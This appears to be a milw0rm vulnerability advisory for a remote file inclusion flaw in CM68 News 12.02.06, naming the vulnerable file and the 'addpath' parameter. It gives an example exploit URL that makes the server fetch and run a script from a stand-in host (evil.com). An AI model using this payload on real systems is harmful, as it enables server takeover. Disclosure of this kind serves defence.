CM68 News 12.02.06 addpth Remote File Inclusion Vulnerability.pdf

1 Vulnerable Software:cm68news 2 Vulnerable file: /engine/oldnews.inc.php 3 Credits: Paul Bakoyiannis 4 Vulnerable Variable: addpath 5 Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& 6 7 # milw0rm.com [2006−12−08] Page 1/1 CM68 News 12.02.06 addpth Remote File Inclusion Vulnerability Paul Bakoyiannis 12/08/2006